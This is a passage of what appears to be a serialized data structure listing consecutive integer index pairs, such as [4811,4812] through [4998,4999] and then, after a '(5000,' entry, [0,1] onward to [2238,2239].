[4811,4812],[4812,4813],[4813,4814],[4814,4815],[4815,4816],[4816,4817],[4817,4818],[4818,4819],[4819,4820],[4820,4821],[4821,4822],[4822,4823],[4823,4824],[4824,4825],[4825,4826],[4826,4827],[4827,4828],[4828,4829],[4829,4830],[4830,4831],[4831,4832],[4832,4833],[4833,4834],[4834,4835],[4835,4836],[4836,4837],[4837,4838],[4838,4839],[4839,4840],[4840,4841],[4841,4842],[4842,4843],[4843,4844],[4844,4845],[4845,4846],[4846,4847],[4847,4848],[4848,4849],[4849,4850],[4850,4851],[4851,4852],[4852,4853],[4853,4854],[4854,4855],[4855,4856],[4856,4857],[4857,4858],[4858,4859],[4859,4860],[4860,4861],[4861,4862],[4862,4863],[4863,4864],[4864,4865],[4865,4866],[4866,4867],[4867,4868],[4868,4869],[4869,4870],[4870,4871],[4871,4872],[4872,4873],[4873,4874],[4874,4875],[4875,4876],[4876,4877],[4877,4878],[4878,4879],[4879,4880],[4880,4881],[4881,4882],[4882,4883],[4883,4884],[4884,4885],[4885,4886],[4886,4887],[4887,4888],[4888,4889],[4889,4890],[4890,4891],[4891,4892],[4892,4893],[4893,4894],[4894,4895],[4895,4896],[4896,4897],[4897,4898],[4898,4899],[4899,4900],[4900,4901],[4901,4902],[4902,4903],[4903,4904],[4904,4905],[4905,4906],[4906,4907],[4907,4908],[4908,4909],[4909,4910],[4910,4911],[4911,4912],[4912,4913],[4913,4914],[4914,4915],[4915,4916],[4916,4917],[4917,4918],[4918,4919],[4919,4920],[4920,4921],[4921,4922],[4922,4923],[4923,4924],[4924,4925],[4925,4926],[4926,4927],[4927,4928],[4928,4929],[4929,4930],[4930,4931],[4931,4932],[4932,4933],[4933,4934],[4934,4935],[4935,4936],[4936,4937],[4937,4938],[4938,4939],[4939,4940],[4940,4941],[4941,4942],[4942,4943],[4943,4944],[4944,4945],[4945,4946],[4946,4947],[4947,4948],[4948,4949],[4949,4950],[4950,4951],[4951,4952],[4952,4953],[4953,4954],[4954,4955],[4955,4956],[4956,4957],[4957,4958],[4958,4959],[4959,4960],[4960,4961],[4961,4962],[4962,4963],[4963,4964],[4964,4965],[4965,4966],[4966,4967],[4967,4968],[4968,4969],[4969,4970],[4970,4971],[4971,4972],[4972,4973],[4973,4974],[4974,4975],[4975,4976],[4976,4977],[4977,4978],[4978,4979],[4979,4980],[4980,4981],[4981,4982],[4982,4983],[4983,4984],[4984,4985],[4985,4986],[4986,4987],[4987,4988],[4988,4989],[4989,4990],[4990,4991],[4991,4992],[4992,4993],[4993,4994],[4994,4995],[4995,4996],[4996,4997],[4997,4998],[4998,4999]]
),
(5000,
[[0,1],[1,2],[2,3],[3,4],[4,5],[5,6],[6,7],[7,8],[8,9],[9,10],[10,11],[11,12],[12,13],[13,14],[14,15],[15,16],[16,17],[17,18],[18,19],[19,20],[20,21],[21,22],[22,23],[23,24],[24,25],[25,26],[26,27],[27,28],[28,29],[29,30],[30,31],[31,32],[32,33],[33,34],[34,35],[35,36],[36,37],[37,38],[38,39],[39,40],[40,41],[41,42],[42,43],[43,44],[44,45],[45,46],[46,47],[47,48],[48,49],[49,50],[50,51],[51,52],[52,53],[53,54],[54,55],[55,56],[56,57],[57,58],[58,59],[59,60],[60,61],[61,62],[62,63],[63,64],[64,65],[65,66],[66,67],[67,68],[68,69],[69,70],[70,71],[71,72],[72,73],[73,74],[74,75],[75,76],[76,77],[77,78],[78,79],[79,80],[80,81],[81,82],[82,83],[83,84],[84,85],[85,86],[86,87],[87,88],[88,89],[89,90],[90,91],[91,92],[92,93],[93,94],[94,95],[95,96],[96,97],[97,98],[98,99],[99,100],[100,101],[101,102],[102,103],[103,104],[104,105],[105,106],[106,107],[107,108],[108,109],[109,110],[110,111],[111,112],[112,113],[113,114],[114,115],[115,116],[116,117],[117,118],[118,119],[119,120],[120,121],[121,122],[122,123],[123,124],[124,125],[125,126],[126,127],[127,128],[128,129],[129,130],[130,131],[131,132],[132,133],[133,134],[134,135],[135,136],[136,137],[137,138],[138,139],[139,140],[140,141],[141,142],[142,143],[143,144],[144,145],[145,146],[146,147],[147,148],[148,149],[149,150],[150,151],[151,152],[152,153],[153,154],[154,155],[155,156],[156,157],[157,158],[158,159],[159,160],[160,161],[161,162],[162,163],[163,164],[164,165],[165,166],[166,167],[167,168],[168,169],[169,170],[170,171],[171,172],[172,173],[173,174],[174,175],[175,176],[176,177],[177,178],[178,179],[179,180],[180,181],[181,182],[182,183],[183,184],[184,185],[185,186],[186,187],[187,188],[188,189],[189,190],[190,191],[191,192],[192,193],[193,194],[194,195],[195,196],[196,197],[197,198],[198,199],[199,200],[200,201],[201,202],[202,203],[203,204],[204,205],[205,206],[206,207],[207,208],[208,209],[209,210],[210,211],[211,212],[212,213],[213,214],[214,215],[215,216],[216,217],[217,218],[218,219],[219,220],[220,221],[221,222],[222,223],[223,224],[224,225],[225,226],[226,227],[227,228],[228,229],[229,230],[230,231],[231,232],[232,233],[233,234],[234,235],[235,236],[236,237],[237,238],[238,239],[239,240],[240,241],[241,242],[242,243],[243,244],[244,245],[245,246],[246,247],[247,248],[248,249],[249,250],[250,251],[251,252],[252,253],[253,254],[254,255],[255,256],[256,257],[257,258],[258,259],[259,260],[260,261],[261,262],[262,263],[263,264],[264,265],[265,266],[266,267],[267,268],[268,269],[269,270],[270,271],[271,272],[272,273],[273,274],[274,275],[275,276],[276,277],[277,278],[278,279],[279,280],[280,281],[281,282],[282,283],[283,284],[284,285],[285,286],[286,287],[287,288],[288,289],[289,290],[290,291],[291,292],[292,293],[293,294],[294,295],[295,296],[296,297],[297,298],[298,299],[299,300],[300,301],[301,302],[302,303],[303,304],[304,305],[305,306],[306,307],[307,308],[308,309],[309,310],[310,311],[311,312],[312,313],[313,314],[314,315],[315,316],[316,317],[317,318],[318,319],[319,320],[320,321],[321,322],[322,323],[323,324],[324,325],[325,326],[326,327],[327,328],[328,329],[329,330],[330,331],[331,332],[332,333],[333,334],[334,335],[335,336],[336,337],[337,338],[338,339],[339,340],[340,341],[341,342],[342,343],[343,344],[344,345],[345,346],[346,347],[347,348],[348,349],[349,350],[350,351],[351,352],[352,353],[353,354],[354,355],[355,356],[356,357],[357,358],[358,359],[359,360],[360,361],[361,362],[362,363],[363,364],[364,365],[365,366],[366,367],[367,368],[368,369],[369,370],[370,371],[371,372],[372,373],[373,374],[374,375],[375,376],[376,377],[377,378],[378,379],[379,380],[380,381],[381,382],[382,383],[383,384],[384,385],[385,386],[386,387],[387,388],[388,389],[389,390],[390,391],[391,392],[392,393],[393,394],[394,395],[395,396],[396,397],[397,398],[398,399],[399,400],[400,401],[401,402],[402,403],[403,404],[404,405],[405,406],[406,407],[407,408],[408,409],[409,410],[410,411],[411,412],[412,413],[413,414],[414,415],[415,416],[416,417],[417,418],[418,419],[419,420],[420,421],[421,422],[422,423],[423,424],[424,425],[425,426],[426,427],[427,428],[428,429],[429,430],[430,431],[431,432],[432,433],[433,434],[434,435],[435,436],[436,437],[437,438],[438,439],[439,440],[440,441],[441,442],[442,443],[443,444],[444,445],[445,446],[446,447],[447,448],[448,449],[449,450],[450,451],[451,452],[452,453],[453,454],[454,455],[455,456],[456,457],[457,458],[458,459],[459,460],[460,461],[461,462],[462,463],[463,464],[464,465],[465,466],[466,467],[467,468],[468,469],[469,470],[470,471],[471,472],[472,473],[473,474],[474,475],[475,476],[476,477],[477,478],[478,479],[479,480],[480,481],[481,482],[482,483],[483,484],[484,485],[485,486],[486,487],[487,488],[488,489],[489,490],[490,491],[491,492],[492,493],[493,494],[494,495],[495,496],[496,497],[497,498],[498,499],[499,500],[500,501],[501,502],[502,503],[503,504],[504,505],[505,506],[506,507],[507,508],[508,509],[509,510],[510,511],[511,512],[512,513],[513,514],[514,515],[515,516],[516,517],[517,518],[518,519],[519,520],[520,521],[521,522],[522,523],[523,524],[524,525],[525,526],[526,527],[527,528],[528,529],[529,530],[530,531],[531,532],[532,533],[533,534],[534,535],[535,536],[536,537],[537,538],[538,539],[539,540],[540,541],[541,542],[542,543],[543,544],[544,545],[545,546],[546,547],[547,548],[548,549],[549,550],[550,551],[551,552],[552,553],[553,554],[554,555],[555,556],[556,557],[557,558],[558,559],[559,560],[560,561],[561,562],[562,563],[563,564],[564,565],[565,566],[566,567],[567,568],[568,569],[569,570],[570,571],[571,572],[572,573],[573,574],[574,575],[575,576],[576,577],[577,578],[578,579],[579,580],[580,581],[581,582],[582,583],[583,584],[584,585],[585,586],[586,587],[587,588],[588,589],[589,590],[590,591],[591,592],[592,593],[593,594],[594,595],[595,596],[596,597],[597,598],[598,599],[599,600],[600,601],[601,602],[602,603],[603,604],[604,605],[605,606],[606,607],[607,608],[608,609],[609,610],[610,611],[611,612],[612,613],[613,614],[614,615],[615,616],[616,617],[617,618],[618,619],[619,620],[620,621],[621,622],[622,623],[623,624],[624,625],[625,626],[626,627],[627,628],[628,629],[629,630],[630,631],[631,632],[632,633],[633,634],[634,635],[635,636],[636,637],[637,638],[638,639],[639,640],[640,641],[641,642],[642,643],[643,644],[644,645],[645,646],[646,647],[647,648],[648,649],[649,650],[650,651],[651,652],[652,653],[653,654],[654,655],[655,656],[656,657],[657,658],[658,659],[659,660],[660,661],[661,662],[662,663],[663,664],[664,665],[665,666],[666,667],[667,668],[668,669],[669,670],[670,671],[671,672],[672,673],[673,674],[674,675],[675,676],[676,677],[677,678],[678,679],[679,680],[680,681],[681,682],[682,683],[683,684],[684,685],[685,686],[686,687],[687,688],[688,689],[689,690],[690,691],[691,692],[692,693],[693,694],[694,695],[695,696],[696,697],[697,698],[698,699],[699,700],[700,701],[701,702],[702,703],[703,704],[704,705],[705,706],[706,707],[707,708],[708,709],[709,710],[710,711],[711,712],[712,713],[713,714],[714,715],[715,716],[716,717],[717,718],[718,719],[719,720],[720,721],[721,722],[722,723],[723,724],[724,725],[725,726],[726,727],[727,728],[728,729],[729,730],[730,731],[731,732],[732,733],[733,734],[734,735],[735,736],[736,737],[737,738],[738,739],[739,740],[740,741],[741,742],[742,743],[743,744],[744,745],[745,746],[746,747],[747,748],[748,749],[749,750],[750,751],[751,752],[752,753],[753,754],[754,755],[755,756],[756,757],[757,758],[758,759],[759,760],[760,761],[761,762],[762,763],[763,764],[764,765],[765,766],[766,767],[767,768],[768,769],[769,770],[770,771],[771,772],[772,773],[773,774],[774,775],[775,776],[776,777],[777,778],[778,779],[779,780],[780,781],[781,782],[782,783],[783,784],[784,785],[785,786],[786,787],[787,788],[788,789],[789,790],[790,791],[791,792],[792,793],[793,794],[794,795],[795,796],[796,797],[797,798],[798,799],[799,800],[800,801],[801,802],[802,803],[803,804],[804,805],[805,806],[806,807],[807,808],[808,809],[809,810],[810,811],[811,812],[812,813],[813,814],[814,815],[815,816],[816,817],[817,818],[818,819],[819,820],[820,821],[821,822],[822,823],[823,824],[824,825],[825,826],[826,827],[827,828],[828,829],[829,830],[830,831],[831,832],[832,833],[833,834],[834,835],[835,836],[836,837],[837,838],[838,839],[839,840],[840,841],[841,842],[842,843],[843,844],[844,845],[845,846],[846,847],[847,848],[848,849],[849,850],[850,851],[851,852],[852,853],[853,854],[854,855],[855,856],[856,857],[857,858],[858,859],[859,860],[860,861],[861,862],[862,863],[863,864],[864,865],[865,866],[866,867],[867,868],[868,869],[869,870],[870,871],[871,872],[872,873],[873,874],[874,875],[875,876],[876,877],[877,878],[878,879],[879,880],[880,881],[881,882],[882,883],[883,884],[884,885],[885,886],[886,887],[887,888],[888,889],[889,890],[890,891],[891,892],[892,893],[893,894],[894,895],[895,896],[896,897],[897,898],[898,899],[899,900],[900,901],[901,902],[902,903],[903,904],[904,905],[905,906],[906,907],[907,908],[908,909],[909,910],[910,911],[911,912],[912,913],[913,914],[914,915],[915,916],[916,917],[917,918],[918,919],[919,920],[920,921],[921,922],[922,923],[923,924],[924,925],[925,926],[926,927],[927,928],[928,929],[929,930],[930,931],[931,932],[932,933],[933,934],[934,935],[935,936],[936,937],[937,938],[938,939],[939,940],[940,941],[941,942],[942,943],[943,944],[944,945],[945,946],[946,947],[947,948],[948,949],[949,950],[950,951],[951,952],[952,953],[953,954],[954,955],[955,956],[956,957],[957,958],[958,959],[959,960],[960,961],[961,962],[962,963],[963,964],[964,965],[965,966],[966,967],[967,968],[968,969],[969,970],[970,971],[971,972],[972,973],[973,974],[974,975],[975,976],[976,977],[977,978],[978,979],[979,980],[980,981],[981,982],[982,983],[983,984],[984,985],[985,986],[986,987],[987,988],[988,989],[989,990],[990,991],[991,992],[992,993],[993,994],[994,995],[995,996],[996,997],[997,998],[998,999],[999,1000],[1000,1001],[1001,1002],[1002,1003],[1003,1004],[1004,1005],[1005,1006],[1006,1007],[1007,1008],[1008,1009],[1009,1010],[1010,1011],[1011,1012],[1012,1013],[1013,1014],[1014,1015],[1015,1016],[1016,1017],[1017,1018],[1018,1019],[1019,1020],[1020,1021],[1021,1022],[1022,1023],[1023,1024],[1024,1025],[1025,1026],[1026,1027],[1027,1028],[1028,1029],[1029,1030],[1030,1031],[1031,1032],[1032,1033],[1033,1034],[1034,1035],[1035,1036],[1036,1037],[1037,1038],[1038,1039],[1039,1040],[1040,1041],[1041,1042],[1042,1043],[1043,1044],[1044,1045],[1045,1046],[1046,1047],[1047,1048],[1048,1049],[1049,1050],[1050,1051],[1051,1052],[1052,1053],[1053,1054],[1054,1055],[1055,1056],[1056,1057],[1057,1058],[1058,1059],[1059,1060],[1060,1061],[1061,1062],[1062,1063],[1063,1064],[1064,1065],[1065,1066],[1066,1067],[1067,1068],[1068,1069],[1069,1070],[1070,1071],[1071,1072],[1072,1073],[1073,1074],[1074,1075],[1075,1076],[1076,1077],[1077,1078],[1078,1079],[1079,1080],[1080,1081],[1081,1082],[1082,1083],[1083,1084],[1084,1085],[1085,1086],[1086,1087],[1087,1088],[1088,1089],[1089,1090],[1090,1091],[1091,1092],[1092,1093],[1093,1094],[1094,1095],[1095,1096],[1096,1097],[1097,1098],[1098,1099],[1099,1100],[1100,1101],[1101,1102],[1102,1103],[1103,1104],[1104,1105],[1105,1106],[1106,1107],[1107,1108],[1108,1109],[1109,1110],[1110,1111],[1111,1112],[1112,1113],[1113,1114],[1114,1115],[1115,1116],[1116,1117],[1117,1118],[1118,1119],[1119,1120],[1120,1121],[1121,1122],[1122,1123],[1123,1124],[1124,1125],[1125,1126],[1126,1127],[1127,1128],[1128,1129],[1129,1130],[1130,1131],[1131,1132],[1132,1133],[1133,1134],[1134,1135],[1135,1136],[1136,1137],[1137,1138],[1138,1139],[1139,1140],[1140,1141],[1141,1142],[1142,1143],[1143,1144],[1144,1145],[1145,1146],[1146,1147],[1147,1148],[1148,1149],[1149,1150],[1150,1151],[1151,1152],[1152,1153],[1153,1154],[1154,1155],[1155,1156],[1156,1157],[1157,1158],[1158,1159],[1159,1160],[1160,1161],[1161,1162],[1162,1163],[1163,1164],[1164,1165],[1165,1166],[1166,1167],[1167,1168],[1168,1169],[1169,1170],[1170,1171],[1171,1172],[1172,1173],[1173,1174],[1174,1175],[1175,1176],[1176,1177],[1177,1178],[1178,1179],[1179,1180],[1180,1181],[1181,1182],[1182,1183],[1183,1184],[1184,1185],[1185,1186],[1186,1187],[1187,1188],[1188,1189],[1189,1190],[1190,1191],[1191,1192],[1192,1193],[1193,1194],[1194,1195],[1195,1196],[1196,1197],[1197,1198],[1198,1199],[1199,1200],[1200,1201],[1201,1202],[1202,1203],[1203,1204],[1204,1205],[1205,1206],[1206,1207],[1207,1208],[1208,1209],[1209,1210],[1210,1211],[1211,1212],[1212,1213],[1213,1214],[1214,1215],[1215,1216],[1216,1217],[1217,1218],[1218,1219],[1219,1220],[1220,1221],[1221,1222],[1222,1223],[1223,1224],[1224,1225],[1225,1226],[1226,1227],[1227,1228],[1228,1229],[1229,1230],[1230,1231],[1231,1232],[1232,1233],[1233,1234],[1234,1235],[1235,1236],[1236,1237],[1237,1238],[1238,1239],[1239,1240],[1240,1241],[1241,1242],[1242,1243],[1243,1244],[1244,1245],[1245,1246],[1246,1247],[1247,1248],[1248,1249],[1249,1250],[1250,1251],[1251,1252],[1252,1253],[1253,1254],[1254,1255],[1255,1256],[1256,1257],[1257,1258],[1258,1259],[1259,1260],[1260,1261],[1261,1262],[1262,1263],[1263,1264],[1264,1265],[1265,1266],[1266,1267],[1267,1268],[1268,1269],[1269,1270],[1270,1271],[1271,1272],[1272,1273],[1273,1274],[1274,1275],[1275,1276],[1276,1277],[1277,1278],[1278,1279],[1279,1280],[1280,1281],[1281,1282],[1282,1283],[1283,1284],[1284,1285],[1285,1286],[1286,1287],[1287,1288],[1288,1289],[1289,1290],[1290,1291],[1291,1292],[1292,1293],[1293,1294],[1294,1295],[1295,1296],[1296,1297],[1297,1298],[1298,1299],[1299,1300],[1300,1301],[1301,1302],[1302,1303],[1303,1304],[1304,1305],[1305,1306],[1306,1307],[1307,1308],[1308,1309],[1309,1310],[1310,1311],[1311,1312],[1312,1313],[1313,1314],[1314,1315],[1315,1316],[1316,1317],[1317,1318],[1318,1319],[1319,1320],[1320,1321],[1321,1322],[1322,1323],[1323,1324],[1324,1325],[1325,1326],[1326,1327],[1327,1328],[1328,1329],[1329,1330],[1330,1331],[1331,1332],[1332,1333],[1333,1334],[1334,1335],[1335,1336],[1336,1337],[1337,1338],[1338,1339],[1339,1340],[1340,1341],[1341,1342],[1342,1343],[1343,1344],[1344,1345],[1345,1346],[1346,1347],[1347,1348],[1348,1349],[1349,1350],[1350,1351],[1351,1352],[1352,1353],[1353,1354],[1354,1355],[1355,1356],[1356,1357],[1357,1358],[1358,1359],[1359,1360],[1360,1361],[1361,1362],[1362,1363],[1363,1364],[1364,1365],[1365,1366],[1366,1367],[1367,1368],[1368,1369],[1369,1370],[1370,1371],[1371,1372],[1372,1373],[1373,1374],[1374,1375],[1375,1376],[1376,1377],[1377,1378],[1378,1379],[1379,1380],[1380,1381],[1381,1382],[1382,1383],[1383,1384],[1384,1385],[1385,1386],[1386,1387],[1387,1388],[1388,1389],[1389,1390],[1390,1391],[1391,1392],[1392,1393],[1393,1394],[1394,1395],[1395,1396],[1396,1397],[1397,1398],[1398,1399],[1399,1400],[1400,1401],[1401,1402],[1402,1403],[1403,1404],[1404,1405],[1405,1406],[1406,1407],[1407,1408],[1408,1409],[1409,1410],[1410,1411],[1411,1412],[1412,1413],[1413,1414],[1414,1415],[1415,1416],[1416,1417],[1417,1418],[1418,1419],[1419,1420],[1420,1421],[1421,1422],[1422,1423],[1423,1424],[1424,1425],[1425,1426],[1426,1427],[1427,1428],[1428,1429],[1429,1430],[1430,1431],[1431,1432],[1432,1433],[1433,1434],[1434,1435],[1435,1436],[1436,1437],[1437,1438],[1438,1439],[1439,1440],[1440,1441],[1441,1442],[1442,1443],[1443,1444],[1444,1445],[1445,1446],[1446,1447],[1447,1448],[1448,1449],[1449,1450],[1450,1451],[1451,1452],[1452,1453],[1453,1454],[1454,1455],[1455,1456],[1456,1457],[1457,1458],[1458,1459],[1459,1460],[1460,1461],[1461,1462],[1462,1463],[1463,1464],[1464,1465],[1465,1466],[1466,1467],[1467,1468],[1468,1469],[1469,1470],[1470,1471],[1471,1472],[1472,1473],[1473,1474],[1474,1475],[1475,1476],[1476,1477],[1477,1478],[1478,1479],[1479,1480],[1480,1481],[1481,1482],[1482,1483],[1483,1484],[1484,1485],[1485,1486],[1486,1487],[1487,1488],[1488,1489],[1489,1490],[1490,1491],[1491,1492],[1492,1493],[1493,1494],[1494,1495],[1495,1496],[1496,1497],[1497,1498],[1498,1499],[1499,1500],[1500,1501],[1501,1502],[1502,1503],[1503,1504],[1504,1505],[1505,1506],[1506,1507],[1507,1508],[1508,1509],[1509,1510],[1510,1511],[1511,1512],[1512,1513],[1513,1514],[1514,1515],[1515,1516],[1516,1517],[1517,1518],[1518,1519],[1519,1520],[1520,1521],[1521,1522],[1522,1523],[1523,1524],[1524,1525],[1525,1526],[1526,1527],[1527,1528],[1528,1529],[1529,1530],[1530,1531],[1531,1532],[1532,1533],[1533,1534],[1534,1535],[1535,1536],[1536,1537],[1537,1538],[1538,1539],[1539,1540],[1540,1541],[1541,1542],[1542,1543],[1543,1544],[1544,1545],[1545,1546],[1546,1547],[1547,1548],[1548,1549],[1549,1550],[1550,1551],[1551,1552],[1552,1553],[1553,1554],[1554,1555],[1555,1556],[1556,1557],[1557,1558],[1558,1559],[1559,1560],[1560,1561],[1561,1562],[1562,1563],[1563,1564],[1564,1565],[1565,1566],[1566,1567],[1567,1568],[1568,1569],[1569,1570],[1570,1571],[1571,1572],[1572,1573],[1573,1574],[1574,1575],[1575,1576],[1576,1577],[1577,1578],[1578,1579],[1579,1580],[1580,1581],[1581,1582],[1582,1583],[1583,1584],[1584,1585],[1585,1586],[1586,1587],[1587,1588],[1588,1589],[1589,1590],[1590,1591],[1591,1592],[1592,1593],[1593,1594],[1594,1595],[1595,1596],[1596,1597],[1597,1598],[1598,1599],[1599,1600],[1600,1601],[1601,1602],[1602,1603],[1603,1604],[1604,1605],[1605,1606],[1606,1607],[1607,1608],[1608,1609],[1609,1610],[1610,1611],[1611,1612],[1612,1613],[1613,1614],[1614,1615],[1615,1616],[1616,1617],[1617,1618],[1618,1619],[1619,1620],[1620,1621],[1621,1622],[1622,1623],[1623,1624],[1624,1625],[1625,1626],[1626,1627],[1627,1628],[1628,1629],[1629,1630],[1630,1631],[1631,1632],[1632,1633],[1633,1634],[1634,1635],[1635,1636],[1636,1637],[1637,1638],[1638,1639],[1639,1640],[1640,1641],[1641,1642],[1642,1643],[1643,1644],[1644,1645],[1645,1646],[1646,1647],[1647,1648],[1648,1649],[1649,1650],[1650,1651],[1651,1652],[1652,1653],[1653,1654],[1654,1655],[1655,1656],[1656,1657],[1657,1658],[1658,1659],[1659,1660],[1660,1661],[1661,1662],[1662,1663],[1663,1664],[1664,1665],[1665,1666],[1666,1667],[1667,1668],[1668,1669],[1669,1670],[1670,1671],[1671,1672],[1672,1673],[1673,1674],[1674,1675],[1675,1676],[1676,1677],[1677,1678],[1678,1679],[1679,1680],[1680,1681],[1681,1682],[1682,1683],[1683,1684],[1684,1685],[1685,1686],[1686,1687],[1687,1688],[1688,1689],[1689,1690],[1690,1691],[1691,1692],[1692,1693],[1693,1694],[1694,1695],[1695,1696],[1696,1697],[1697,1698],[1698,1699],[1699,1700],[1700,1701],[1701,1702],[1702,1703],[1703,1704],[1704,1705],[1705,1706],[1706,1707],[1707,1708],[1708,1709],[1709,1710],[1710,1711],[1711,1712],[1712,1713],[1713,1714],[1714,1715],[1715,1716],[1716,1717],[1717,1718],[1718,1719],[1719,1720],[1720,1721],[1721,1722],[1722,1723],[1723,1724],[1724,1725],[1725,1726],[1726,1727],[1727,1728],[1728,1729],[1729,1730],[1730,1731],[1731,1732],[1732,1733],[1733,1734],[1734,1735],[1735,1736],[1736,1737],[1737,1738],[1738,1739],[1739,1740],[1740,1741],[1741,1742],[1742,1743],[1743,1744],[1744,1745],[1745,1746],[1746,1747],[1747,1748],[1748,1749],[1749,1750],[1750,1751],[1751,1752],[1752,1753],[1753,1754],[1754,1755],[1755,1756],[1756,1757],[1757,1758],[1758,1759],[1759,1760],[1760,1761],[1761,1762],[1762,1763],[1763,1764],[1764,1765],[1765,1766],[1766,1767],[1767,1768],[1768,1769],[1769,1770],[1770,1771],[1771,1772],[1772,1773],[1773,1774],[1774,1775],[1775,1776],[1776,1777],[1777,1778],[1778,1779],[1779,1780],[1780,1781],[1781,1782],[1782,1783],[1783,1784],[1784,1785],[1785,1786],[1786,1787],[1787,1788],[1788,1789],[1789,1790],[1790,1791],[1791,1792],[1792,1793],[1793,1794],[1794,1795],[1795,1796],[1796,1797],[1797,1798],[1798,1799],[1799,1800],[1800,1801],[1801,1802],[1802,1803],[1803,1804],[1804,1805],[1805,1806],[1806,1807],[1807,1808],[1808,1809],[1809,1810],[1810,1811],[1811,1812],[1812,1813],[1813,1814],[1814,1815],[1815,1816],[1816,1817],[1817,1818],[1818,1819],[1819,1820],[1820,1821],[1821,1822],[1822,1823],[1823,1824],[1824,1825],[1825,1826],[1826,1827],[1827,1828],[1828,1829],[1829,1830],[1830,1831],[1831,1832],[1832,1833],[1833,1834],[1834,1835],[1835,1836],[1836,1837],[1837,1838],[1838,1839],[1839,1840],[1840,1841],[1841,1842],[1842,1843],[1843,1844],[1844,1845],[1845,1846],[1846,1847],[1847,1848],[1848,1849],[1849,1850],[1850,1851],[1851,1852],[1852,1853],[1853,1854],[1854,1855],[1855,1856],[1856,1857],[1857,1858],[1858,1859],[1859,1860],[1860,1861],[1861,1862],[1862,1863],[1863,1864],[1864,1865],[1865,1866],[1866,1867],[1867,1868],[1868,1869],[1869,1870],[1870,1871],[1871,1872],[1872,1873],[1873,1874],[1874,1875],[1875,1876],[1876,1877],[1877,1878],[1878,1879],[1879,1880],[1880,1881],[1881,1882],[1882,1883],[1883,1884],[1884,1885],[1885,1886],[1886,1887],[1887,1888],[1888,1889],[1889,1890],[1890,1891],[1891,1892],[1892,1893],[1893,1894],[1894,1895],[1895,1896],[1896,1897],[1897,1898],[1898,1899],[1899,1900],[1900,1901],[1901,1902],[1902,1903],[1903,1904],[1904,1905],[1905,1906],[1906,1907],[1907,1908],[1908,1909],[1909,1910],[1910,1911],[1911,1912],[1912,1913],[1913,1914],[1914,1915],[1915,1916],[1916,1917],[1917,1918],[1918,1919],[1919,1920],[1920,1921],[1921,1922],[1922,1923],[1923,1924],[1924,1925],[1925,1926],[1926,1927],[1927,1928],[1928,1929],[1929,1930],[1930,1931],[1931,1932],[1932,1933],[1933,1934],[1934,1935],[1935,1936],[1936,1937],[1937,1938],[1938,1939],[1939,1940],[1940,1941],[1941,1942],[1942,1943],[1943,1944],[1944,1945],[1945,1946],[1946,1947],[1947,1948],[1948,1949],[1949,1950],[1950,1951],[1951,1952],[1952,1953],[1953,1954],[1954,1955],[1955,1956],[1956,1957],[1957,1958],[1958,1959],[1959,1960],[1960,1961],[1961,1962],[1962,1963],[1963,1964],[1964,1965],[1965,1966],[1966,1967],[1967,1968],[1968,1969],[1969,1970],[1970,1971],[1971,1972],[1972,1973],[1973,1974],[1974,1975],[1975,1976],[1976,1977],[1977,1978],[1978,1979],[1979,1980],[1980,1981],[1981,1982],[1982,1983],[1983,1984],[1984,1985],[1985,1986],[1986,1987],[1987,1988],[1988,1989],[1989,1990],[1990,1991],[1991,1992],[1992,1993],[1993,1994],[1994,1995],[1995,1996],[1996,1997],[1997,1998],[1998,1999],[1999,2000],[2000,2001],[2001,2002],[2002,2003],[2003,2004],[2004,2005],[2005,2006],[2006,2007],[2007,2008],[2008,2009],[2009,2010],[2010,2011],[2011,2012],[2012,2013],[2013,2014],[2014,2015],[2015,2016],[2016,2017],[2017,2018],[2018,2019],[2019,2020],[2020,2021],[2021,2022],[2022,2023],[2023,2024],[2024,2025],[2025,2026],[2026,2027],[2027,2028],[2028,2029],[2029,2030],[2030,2031],[2031,2032],[2032,2033],[2033,2034],[2034,2035],[2035,2036],[2036,2037],[2037,2038],[2038,2039],[2039,2040],[2040,2041],[2041,2042],[2042,2043],[2043,2044],[2044,2045],[2045,2046],[2046,2047],[2047,2048],[2048,2049],[2049,2050],[2050,2051],[2051,2052],[2052,2053],[2053,2054],[2054,2055],[2055,2056],[2056,2057],[2057,2058],[2058,2059],[2059,2060],[2060,2061],[2061,2062],[2062,2063],[2063,2064],[2064,2065],[2065,2066],[2066,2067],[2067,2068],[2068,2069],[2069,2070],[2070,2071],[2071,2072],[2072,2073],[2073,2074],[2074,2075],[2075,2076],[2076,2077],[2077,2078],[2078,2079],[2079,2080],[2080,2081],[2081,2082],[2082,2083],[2083,2084],[2084,2085],[2085,2086],[2086,2087],[2087,2088],[2088,2089],[2089,2090],[2090,2091],[2091,2092],[2092,2093],[2093,2094],[2094,2095],[2095,2096],[2096,2097],[2097,2098],[2098,2099],[2099,2100],[2100,2101],[2101,2102],[2102,2103],[2103,2104],[2104,2105],[2105,2106],[2106,2107],[2107,2108],[2108,2109],[2109,2110],[2110,2111],[2111,2112],[2112,2113],[2113,2114],[2114,2115],[2115,2116],[2116,2117],[2117,2118],[2118,2119],[2119,2120],[2120,2121],[2121,2122],[2122,2123],[2123,2124],[2124,2125],[2125,2126],[2126,2127],[2127,2128],[2128,2129],[2129,2130],[2130,2131],[2131,2132],[2132,2133],[2133,2134],[2134,2135],[2135,2136],[2136,2137],[2137,2138],[2138,2139],[2139,2140],[2140,2141],[2141,2142],[2142,2143],[2143,2144],[2144,2145],[2145,2146],[2146,2147],[2147,2148],[2148,2149],[2149,2150],[2150,2151],[2151,2152],[2152,2153],[2153,2154],[2154,2155],[2155,2156],[2156,2157],[2157,2158],[2158,2159],[2159,2160],[2160,2161],[2161,2162],[2162,2163],[2163,2164],[2164,2165],[2165,2166],[2166,2167],[2167,2168],[2168,2169],[2169,2170],[2170,2171],[2171,2172],[2172,2173],[2173,2174],[2174,2175],[2175,2176],[2176,2177],[2177,2178],[2178,2179],[2179,2180],[2180,2181],[2181,2182],[2182,2183],[2183,2184],[2184,2185],[2185,2186],[2186,2187],[2187,2188],[2188,2189],[2189,2190],[2190,2191],[2191,2192],[2192,2193],[2193,2194],[2194,2195],[2195,2196],[2196,2197],[2197,2198],[2198,2199],[2199,2200],[2200,2201],[2201,2202],[2202,2203],[2203,2204],[2204,2205],[2205,2206],[2206,2207],[2207,2208],[2208,2209],[2209,2210],[2210,2211],[2211,2212],[2212,2213],[2213,2214],[2214,2215],[2215,2216],[2216,2217],[2217,2218],[2218,2219],[2219,2220],[2220,2221],[2221,2222],[2222,2223],[2223,2224],[2224,2225],[2225,2226],[2226,2227],[2227,2228],[2228,2229],[2229,2230],[2230,2231],[2231,2232],[2232,2233],[2233,2234],[2234,2235],[2235,2236],[2236,2237],[2237,2238],[2238,2239]